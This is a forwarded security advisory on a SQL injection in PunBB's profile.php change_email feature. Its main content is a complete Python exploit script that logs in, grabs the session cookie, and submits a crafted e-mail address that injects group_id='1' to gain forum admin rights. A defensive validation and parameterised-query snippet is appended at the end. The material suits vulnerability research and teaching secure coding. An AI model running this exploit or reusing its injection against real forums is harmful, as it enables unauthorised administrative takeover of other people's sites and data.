[Forwarded] PunBB profile.php Remote SQL Injection Vulnerability (Other, flaw)
Affected program:
PunBB
Description:
PunBB profile.php Remote SQL Injection Vulnerability
Details:
PunBB is a PHP-based forum program.
PunBB contains a SQL injection vulnerability that may allow a remote attacker to gain unauthorized access to the database.
The cause is that profile.php does not properly validate user-supplied input before using it in an SQL query. An attacker can exploit this vulnerability to obtain administrative access to a vulnerable forum.
<*Source: exploits@nopiracy.de (exploits@nopiracy.de)
Link: http://marc.theaimsgroup.com/?l=bugtraq&m=111306207306155&w=2
*>
Affected systems:
PunBB PunBB 1.2.4
PunBB PunBB 1.2.3
PunBB PunBB 1.2.2
PunBB PunBB 1.2.1
PunBB PunBB 1.1.5
PunBB PunBB 1.1.4
PunBB PunBB 1.1.3
PunBB PunBB 1.1.2
PunBB PunBB 1.1.1
PunBB PunBB 1.1
PunBB PunBB 1.0.1
PunBB PunBB 1.0
Attack method:
The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users bear the risk themselves!
import urllib
import getopt
import sys
import string

__argv__ = sys.argv

def banner():
    print "PunBB 1.2.4 - change_email SQL injection exploit"
    print "Copyright (C) 2005 Hardened-PHP Project\n"

def usage():
    banner()
    print "Usage:\n"
    print " $ ./punbb_change_email.py [options]\n"
    print " -h http_url    url of the punBB forum to exploit"
    print "                f.e. http://www.forum.net/punBB/"
    print " -u username    punBB forum useraccount"
    print " -p password    punBB forum userpassword"
    print " -e email       email address where the admin level activation email \
is sent"
    print " -d domain      catch all domain to catch \
\"some-SQL-Query\"@domain emails"
    print ""
    sys.exit(-1)

def main():
    try:
        opts, args = getopt.getopt(sys.argv[1:], "h:u:p:e:d:")
    except getopt.GetoptError:
        usage()
    if len(__argv__) < 10:
        usage()
    username = None
    password = None
    email = None
    domain = None
    host = None
    for o, arg in opts:
        if o == "-h":
            host = arg
        if o == "-u":
            username = arg
        if o == "-p":
            password = arg
        if o == "-e":
            email = arg
        if o == "-d":
            domain = arg
    # Printout banner
    banner()
    # Check if everything we need is there
    if host == None:
        print "[-] need a host to connect to"
        sys.exit(-1)
    if username == None:
        print "[-] username needed to continue"
        sys.exit(-1)
    if password == None:
        print "[-] password needed to continue"
        sys.exit(-1)
    if email == None:
        print "[-] email address needed to continue"
        sys.exit(-1)
    if domain == None:
        print "[-] catch all domain needed to continue"
        sys.exit(-1)
    # Retrieve cookie
    params = {
        'req_username' : username,
        'req_password' : password,
        'form_sent' : 1
    }
    wclient = urllib.URLopener()
    print "[+] Connecting to retrieve cookie"
    req = wclient.open(host + "/login.php?action=in", urllib.urlencode(params))
    info = req.info()
    if 'set-cookie' not in info:
        print "[-] Unable to retrieve cookie... something is wrong"
        sys.exit(-3)
    cookie = info['set-cookie']
    cookie = cookie[:string.find(cookie, ';')]
    print "[+] Cookie found - extracting user_id"
    user_id = cookie[string.find(cookie, "%3A%22")+6:string.find(cookie, "%22%3B")]
    print "[+] User-ID: %d" % (int(user_id))
    wclient.addheader('Cookie', cookie)
    # Build the new e-mail address: quoted local part, then the injected fragment,
    # padded to 50 characters, then the catch-all domain
    email = '"' + email[:string.find(email, '@')] + '"@' + email[string.find(email, \
        '@')+1:] + ',"\','
    append = 'group_id=\'1'
    email = email + ( ((50-len(append))-len(email)) * ' ' ) + append + '"@' + domain
    params = {
        'req_new_email' : email,
        'form_sent' : 1
    }
    print "[+] Connecting to request change email"
    req = wclient.open(host + "profile.php?action=change_email&id=" + user_id, \
                       urllib.urlencode(params))
    print "[+] Done... Now wait for the email. Log into punBB, go to the link in the \
email and become admin"

if __name__ == "__main__":
    main()
Solution:
Vendor patch:
PunBB
-----
The vendor has not yet released a patch or upgrade. We recommend that users of this software watch the vendor's home page for the latest version:
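As an added illustration (not part of the original advisory or of PunBB's own code), the following Python 3 snippet shows the defensive side of the same change_email flow: a strict e-mail allow-list that rejects the quoted-local-part address shape the exploit above submits, an integer-cast id parameter, and an UPDATE that binds the address as a parameter. sqlite3 stands in for PunBB's MySQL back end; the 50-character column limit (taken from the exploit's padding), the table layout and the group_id values are assumptions.

```python
import re
import sqlite3

# Assumed limits for this hardened handler (not PunBB's own code): the exploit pads its
# payload to 50 characters, so a 50-character e-mail column is assumed here.
MAX_EMAIL_LEN = 50
LOCAL_RE = re.compile(r"^[A-Za-z0-9._%+-]{1,64}$")
DOMAIN_RE = re.compile(r"^(?:[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?\.)+[A-Za-z]{2,63}$")

def validate_new_email(addr):
    """Strict allow-list for a req_new_email value: quoted local parts ("x"@host), quotes,
    commas and spaces are rejected, so the exploit's address shape never reaches the DB."""
    if len(addr) > MAX_EMAIL_LEN:
        return False, "too long"
    if addr.count("@") != 1:
        return False, "exactly one @ required"
    local, domain = addr.split("@")
    if not LOCAL_RE.match(local):
        return False, "invalid local part"
    if not DOMAIN_RE.match(domain):
        return False, "invalid domain"
    return True, "ok"

def change_email(conn, user_id, addr):
    """Hardened change_email: the id is cast to int, the address is validated, and the
    UPDATE binds the value as a parameter so it can only ever land in the email column."""
    try:
        uid = int(user_id)
    except ValueError:
        return False, "invalid id"
    ok, reason = validate_new_email(addr)
    if not ok:
        return False, reason
    cur = conn.execute("UPDATE users SET email = ? WHERE id = ?", (addr, uid))
    return (True, "updated") if cur.rowcount == 1 else (False, "no such user")

def demo():
    """Constructed sample: one ordinary member (group_id 4 assumed), a benign address and
    an address built in the same shape as the exploit's payload (constructed, not live)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, group_id INTEGER)")
    conn.execute("INSERT INTO users VALUES (2, 'old@example.org', 4)")
    payload = '"alice"@example.org,"\',  group_id=\'1"@c.example'
    return {
        "benign": change_email(conn, "2", "alice@example.org"),
        "payload": change_email(conn, "2", payload),
        "bad_id": change_email(conn, "2;", "alice@example.org"),
        "group_id": conn.execute("SELECT group_id FROM users WHERE id = 2").fetchone()[0],
    }
```

Running `demo()` shows the benign address accepted, the payload-shaped address and the non-numeric id rejected before any query runs, and group_id left at its original value.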